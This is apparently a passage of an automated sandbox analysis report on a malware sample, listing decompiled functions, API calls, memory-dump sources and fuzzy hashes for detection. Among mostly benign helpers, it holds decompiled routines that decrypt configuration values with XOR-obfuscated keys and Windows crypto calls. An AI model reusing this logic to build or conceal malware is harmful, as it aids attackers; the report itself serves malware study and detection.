Function 6E1E5597, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D61BC: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E1D61FD

_free.LIBCMT ref: 6E1E5606

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 79eaee72817152019c2cee8095f0539f33b70c0477684e2b214c9decaee01b7e
Instruction ID: c3a5a2974e5a989c4d1847e7c995f7f9b4f69ec995fd6bad298996800ac5bf61
Opcode Fuzzy Hash: 79eaee72817152019c2cee8095f0539f33b70c0477684e2b214c9decaee01b7e
Instruction Fuzzy Hash: 800149726043166BC320CFD8C8849C9FBACEB15374F110729F555A7AC0E370A854CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03084576, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E03084576(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x308a2d4; // 0x2b2d5a8
				_t4 = _t15 + 0x308b390; // 0x5bb8938
				_t20 = _t4;
				_t6 = _t15 + 0x308b124; // 0x650047
				_t17 = E03086872(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E03083875(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x03084580
0x03084582
0x03084589
0x0308458a
0x0308458b
0x0308458c
0x03084592
0x03084597
0x03084597
0x030845a1
0x030845b3
0x030845ba
0x030845e9
0x030845bc
0x030845c1
0x030845e6
0x030845c3
0x030845c6
0x030845cd
0x030845d8
0x030845cf
0x030845d2
0x030845d2
0x030845dc
0x030845dc
0x030845c1
0x030845f0

APIs

Part of subcall function 03086872: SysFreeString.OLEAUT32(?), ref: 03086951

Part of subcall function 03083875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,030871C8,004F0053,00000000,?), ref: 0308387E
Part of subcall function 03083875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,030871C8,004F0053,00000000,?), ref: 030838A8
Part of subcall function 03083875: memset.NTDLL ref: 030838BC

SysFreeString.OLEAUT32(00000000), ref: 030845DC

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 6c8f9c47ec0a293057eff974ff10bb3e395978babb0bfaa308d5c8a30131327a
Instruction ID: 140bf0d9c0c05af1b9768d55e53168bbbff34dae5e3fbf0ff6d7abf140df3f86
Opcode Fuzzy Hash: 6c8f9c47ec0a293057eff974ff10bb3e395978babb0bfaa308d5c8a30131327a
Instruction Fuzzy Hash: 07015E3550212ABFCB51FBA9CC049AEBBB8FB44754F000965F985E6021D7B19A618791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D61BC, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E1D61FD

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2096f67707d9a272a5a2051f2090ad4390ca25f8dd870293526691164654d9ac
Instruction ID: 29f58cf6a85f88717f2a16b1174f910c236318ad1ccb2e56c22f1a47d3822721
Opcode Fuzzy Hash: 2096f67707d9a272a5a2051f2090ad4390ca25f8dd870293526691164654d9ac
Instruction Fuzzy Hash: BFF0503266463E9AEB015BE68C14B8B374D9FB1770B124161EC24D6141DB20D4C8A6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF6DA, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,000000FF,000000FF), ref: 6E1DF70C

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 958df50e8955401c5e8988dab2fe763099b144160757be6df3a9af7fa195b062
Instruction ID: 1b4e9b2765c81eb7a1035ab9ce0d0b9da3085014f0da0fc674bc465af37de44f
Opcode Fuzzy Hash: 958df50e8955401c5e8988dab2fe763099b144160757be6df3a9af7fa195b062
Instruction Fuzzy Hash: 59E0E5311446229EEB511BE69C047C7379D9F662B5F324220EC3496190DB10CAC8A1F1

Uniqueness

Uniqueness Score: -1.00%

Function 0308798C, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0308798C() {

				E03087A76(0x3089344, 0x308a140); // executed
				goto __eax;
			}

0x0308799e
0x030879a5

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0308799E

Part of subcall function 03087A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03087AEF

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2f04a169851d1e475461098fd2daa3a2fb939ad28cf46b9686b9c403959123f1
Instruction ID: 8291fb53c408230feaa5454fe4a87ad078900c3badbcb1ed18e61e1e8d70b1e4
Opcode Fuzzy Hash: 2f04a169851d1e475461098fd2daa3a2fb939ad28cf46b9686b9c403959123f1
Instruction Fuzzy Hash: 19B0129535B201BC3118F3095C06D7E054CC0C1E91330841FF0D0CC04895440D010039

Uniqueness

Uniqueness Score: -1.00%

Function 030879A7, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030879A7() {

				E03087A76(0x3089344, 0x308a150); // executed
				goto __eax;
			}

0x0308799e
0x030879a5

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0308799E

Part of subcall function 03087A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03087AEF

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: c2f54f9134db609749a7b89e57cb0cfd33a5aa664c3f28205de67130fb0ffdd9
Instruction ID: f9da4cceb0aeb27a9514425215919ed4785ff7170997b505907ed742e96f30a0
Opcode Fuzzy Hash: c2f54f9134db609749a7b89e57cb0cfd33a5aa664c3f28205de67130fb0ffdd9
Instruction Fuzzy Hash: C6B0128535B101EC3108F3485C06E7E058CC0C1E10330C81FF0D0CC248D5400C050035

Uniqueness

Uniqueness Score: -1.00%

Function 03086837, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03086837(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x308a290, 0, _a4); // executed
				return _t2;
			}

0x03086843
0x03086849

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c14eaf1703f519caed5fdb63439ff307a2f2cc25012a870ac5b10ab4d9ac9670
Instruction ID: 0d9c58c0efe9a56f5939f1da270250777eba966008c8ca90c745fa779bd1e3a2
Opcode Fuzzy Hash: c14eaf1703f519caed5fdb63439ff307a2f2cc25012a870ac5b10ab4d9ac9670
Instruction Fuzzy Hash: 04B01231116100AFCA127B40DD04F067F32B750B00F204011B28540468833A0430FF04

Uniqueness

Uniqueness Score: -1.00%

Function 030850CA, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E030850CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x308a290, 0, _a4); // executed
				return _t2;
			}

0x030850d6
0x030850dc

APIs

RtlFreeHeap.NTDLL(00000000,00000000,03084239,00000000,00000001,?,00000000,?,?,?,03086B8D,00000000,?,00000001), ref: 030850D6

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 246850184f57f00af1d9f1b83c60048e7a037e9187fd43105e90f040c59c208d
Instruction ID: 3fd9b545e4a5a235552d95653be4ba8e433c11203c1e07f14f2e29b8efad275c
Opcode Fuzzy Hash: 246850184f57f00af1d9f1b83c60048e7a037e9187fd43105e90f040c59c208d
Instruction Fuzzy Hash: 58B01271205100EFCB227B00DE04F067F22B750B00F004011B38844478833A0430FF15

Uniqueness

Uniqueness Score: -1.00%

Function 03085384, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03085384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E03086A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x308a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E03084576(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x03085384
0x0308538c
0x030853a3
0x030853be
0x030853c2
0x030853c7
0x030853c9
0x030853d9
0x030853e5
0x030853cb
0x030853cb
0x030853ce
0x030853d3
0x030853d3
0x030853c9
0x030853eb
0x030853ef
0x030853ef
0x03085398
0x0308539d
0x030853a1
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 03084576: SysFreeString.OLEAUT32(00000000), ref: 030845DC

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,03081AF5,?,004F0053,05BB9308,00000000,?), ref: 030853E5

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: a5b934ded52525a1a32f697f3a4603cecd0f6ee1f80dacb3cb749d1ca282e344
Instruction ID: 22390ed309f5dff9312b49739be1f27ec5a9eb8454fdb4c85a3ca90689f23bab
Opcode Fuzzy Hash: a5b934ded52525a1a32f697f3a4603cecd0f6ee1f80dacb3cb749d1ca282e344
Instruction Fuzzy Hash: 0B01F632102619BBCB22EF44CC51FEE7BA9FB04790F088429FE859A660D771D960DB94

Uniqueness

Uniqueness Score: -1.00%

Function 030849FE, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E030849FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E030839C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E03086837(_a8 + _a8);
					if(_t21 != 0) {
						E03082E61(_a4, _t21, _t23);
					}
					E030850CA(_a4);
				}
				return _t21;
			}

0x03084a06
0x03084a0d
0x03084a0f
0x03084a1e
0x03084a25
0x03084a34
0x03084a38
0x03084a3f
0x03084a3f
0x03084a47
0x03084a4c
0x03084a51

APIs

lstrlen.KERNEL32(00000000,00000000,030870D9,00000000,?,030862B1,00000000,030870D9,?,00000000,030870D9,00000000,05BB9630), ref: 03084A0F

Part of subcall function 030839C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,03084A23,00000001,030870D9,00000000), ref: 030839FD
Part of subcall function 030839C5: memcpy.NTDLL(03084A23,030870D9,00000010,?,?,?,03084A23,00000001,030870D9,00000000,?,030862B1,00000000,030870D9,?,00000000), ref: 03083A16
Part of subcall function 030839C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 03083A3F
Part of subcall function 030839C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 03083A57
Part of subcall function 030839C5: memcpy.NTDLL(00000000,00000000,05BB9630,00000010), ref: 03083AA9

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: f50c54cb02309a8f1f12686df013e20c1725b0a7ae5fab44ec09cd412ec741da
Instruction ID: 74ea451f39930f91dc473621f0d47b74e83e914563d552ec9edaaee9585459c2
Opcode Fuzzy Hash: f50c54cb02309a8f1f12686df013e20c1725b0a7ae5fab44ec09cd412ec741da
Instruction Fuzzy Hash: C1F01D7A101209BACF11BF55DC00DEF3BADEF85654B058011BD488E110DA71D5559BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03081F7A, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03081F7A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E03081A15(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E030817B0(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x03081f82
0x03081f9c
0x00000000
0x03081fb8
0x03081f93
0x03081f9a
0x00000000
0x00000000
0x03081fbf

APIs

lstrlenW.KERNEL32(?,?,?,03081F20,3D030890,80000002,030830C2,03084106,74666F53,4D4C4B48,03084106,?,3D030890,80000002,030830C2,?), ref: 03081F9F

Part of subcall function 030817B0: SysAllocString.OLEAUT32(03084106), ref: 030817CA
Part of subcall function 030817B0: SysFreeString.OLEAUT32(00000000), ref: 0308180A

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 34e8c72bb92cb1ea1521ea206e50872ab71de817d998923a0ab96cca9ca516d5
Instruction ID: f605e6a0cdc46e18c80be406a654e7aaca889f209dd8b82add4aafbb6a84ed89
Opcode Fuzzy Hash: 34e8c72bb92cb1ea1521ea206e50872ab71de817d998923a0ab96cca9ca516d5
Instruction Fuzzy Hash: C7F0923600520EBFDF06AF90DC05EEA7F7AAF18350F048014FA4458062D772D5B2EBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03082206, Relevance: 10.7, APIs: 7, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E03082206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x308a2d0; // 0x63699bc3
				if(E03081BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x308a324 = _v8;
				}
				_t31 =  *0x308a2d0; // 0x63699bc3
				if(E03081BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x308a2d0; // 0x63699bc3
				if(E03081BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x308a290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x308a2d0; // 0x63699bc3
						_t43 = E030838CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x308a298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x308a2d0; // 0x63699bc3
						_t44 = E030838CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x308a29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x308a2d0; // 0x63699bc3
						_t45 = E030838CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x308a2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x308a2d0; // 0x63699bc3
						_t46 = E030838CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x308a004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x308a2d0; // 0x63699bc3
						_t47 = E030838CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x308a02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x308a2d0; // 0x63699bc3
						_t48 = E030838CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E03083E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E030850DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x308a2d0; // 0x63699bc3
						_t49 = E030838CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E03083E49(0, _t49) != 0) {
						_t102 =  *0x308a37c; // 0x5bb9630
						E030810DD(_t102 + 4, _t54);
					}
					_t50 =  *0x308a2d4; // 0x2b2d5a8
					_t20 = _t50 + 0x308b252; // 0x5bb87fa
					_t21 = _t50 + 0x308b7b5; // 0x6976612e
					 *0x308a320 = _t20;
					 *0x308a390 = _t21;
					HeapFree( *0x308a290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x03082206
0x03082209
0x03082229
0x03082237
0x03082237
0x0308223c
0x03082256
0x0308242a
0x03082431
0x03082438
0x03082438
0x0308225c
0x03082278
0x03082418
0x03082422
0x00000000
0x0308227e
0x0308227e
0x03082283
0x03082299
0x03082285
0x03082285
0x03082292
0x03082292
0x030822a3
0x030822a5
0x030822af
0x030822b4
0x030822b4
0x030822af
0x030822bb
0x030822d1
0x030822bd
0x030822bd
0x030822ca
0x030822ca
0x030822d5
0x030822d7
0x030822e1
0x030822e6
0x030822e6
0x030822e1
0x030822ed
0x03082303
0x030822ef
0x030822ef
0x030822fc
0x030822fc
0x03082307
0x03082309
0x03082313
0x03082318
0x03082318
0x03082313
0x0308231f
0x03082335
0x03082321
0x03082321
0x0308232e
0x0308232e
0x03082339
0x0308233b
0x03082345
0x0308234a
0x0308234a
0x03082345
0x03082351
0x03082367
0x03082353
0x03082353
0x03082360
0x03082360
0x0308236b
0x0308236d
0x03082377
0x0308237c
0x0308237c
0x03082377
0x03082383
0x03082399
0x03082385
0x03082385
0x03082392
0x03082392
0x0308239d
0x0308239f
0x030823a2
0x030823a3
0x030823aa
0x030823ac
0x030823ad
0x030823ad
0x030823aa
0x030823b4
0x030823ca
0x030823b6
0x030823b6
0x030823c3
0x030823c3
0x030823ce
0x030823dc
0x030823e6
0x030823e6
0x030823eb
0x030823f1
0x030823fe
0x03082404
0x0308240a
0x0308240f
0x03082415
0x00000000
0x03082415

APIs

StrToIntExA.SHLWAPI(00000000,00000000,030855D3,?,030855D3,63699BC3,?,?,63699BC3,030855D3,?,63699BC3,E8FA7DD7,0308A00C,7742C740), ref: 030822AB
StrToIntExA.SHLWAPI(00000000,00000000,030855D3,?,030855D3,63699BC3,?,?,63699BC3,030855D3,?,63699BC3,E8FA7DD7,0308A00C,7742C740), ref: 030822DD
StrToIntExA.SHLWAPI(00000000,00000000,030855D3,?,030855D3,63699BC3,?,?,63699BC3,030855D3,?,63699BC3,E8FA7DD7,0308A00C,7742C740), ref: 0308230F
StrToIntExA.SHLWAPI(00000000,00000000,030855D3,?,030855D3,63699BC3,?,?,63699BC3,030855D3,?,63699BC3,E8FA7DD7,0308A00C,7742C740), ref: 03082341
StrToIntExA.SHLWAPI(00000000,00000000,030855D3,?,030855D3,63699BC3,?,?,63699BC3,030855D3,?,63699BC3,E8FA7DD7,0308A00C,7742C740), ref: 03082373
HeapFree.KERNEL32(00000000,?,?,030855D3,63699BC3,?,?,63699BC3,030855D3,?,63699BC3,E8FA7DD7,0308A00C,7742C740), ref: 0308240F
HeapFree.KERNEL32(00000000,?,?,030855D3,63699BC3,?,?,63699BC3,030855D3,?,63699BC3,E8FA7DD7,0308A00C,7742C740), ref: 03082422

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 49c73db677cf0c802bc24524286ba1d885c935763ac78d7fa189899e97bc9d1a
Instruction ID: 80658c904e4fe3df19866ae5b7d10253ad68c715428e88f1f7cf2114d46f4a73
Opcode Fuzzy Hash: 49c73db677cf0c802bc24524286ba1d885c935763ac78d7fa189899e97bc9d1a
Instruction Fuzzy Hash: 5661A775B02208EFC751FBB9DC98C9FB7EDAB88700B180D56B581D7504EA39D9418B64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E51A5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6E1E54C3,00000002,00000000,?,?,?,6E1E54C3,?,00000000), ref: 6E1E523E
GetLocaleInfoW.KERNEL32(?,20001004,6E1E54C3,00000002,00000000,?,?,?,6E1E54C3,?,00000000), ref: 6E1E5267
GetACP.KERNEL32(?,?,6E1E54C3,?,00000000), ref: 6E1E527C

Strings

ACP, xrefs: 6E1E51C3
OCP, xrefs: 6E1E51F9

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d2399ae59b5dcf9bfe632a20ea071db0f6ea5bf39e31d1867fbbbee154b09164
Instruction ID: 22fcaa259e0165e23ce3ddd6401f7b40b499eff69f7428183c2a9e6d449ed677
Opcode Fuzzy Hash: d2399ae59b5dcf9bfe632a20ea071db0f6ea5bf39e31d1867fbbbee154b09164
Instruction Fuzzy Hash: D821A476614902EBD7548BD9C904A8773B7EF65B54B628424F90AD7904E732DEC0E350

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E49FB, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

GetACP.KERNEL32(?,?,?,?,?,?,6E1D8D41,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E1E4ABC
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E1D8D41,?,?,?,00000055,?,-00000050,?,?), ref: 6E1E4AE7
_wcschr.LIBVCRUNTIME ref: 6E1E4B7B
_wcschr.LIBVCRUNTIME ref: 6E1E4B89
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E1E4C4A

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: b1c61fbe6ee8d9429d143f552bc24d90f594f9290f48d476f6ede1290b124c51
Instruction ID: 86bee11c17db764475f104d4cb21414daaf90ee43412a61d782a6311a5821637
Opcode Fuzzy Hash: b1c61fbe6ee8d9429d143f552bc24d90f594f9290f48d476f6ede1290b124c51
Instruction Fuzzy Hash: BE712835604A16AAE718DBF5CC41FAA73ACFF94314F204829F516DB980E770E9C2A764

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E537A, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

Part of subcall function 6E1D7990: _free.LIBCMT ref: 6E1D79F2
Part of subcall function 6E1D7990: _free.LIBCMT ref: 6E1D7A28

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E1E5486
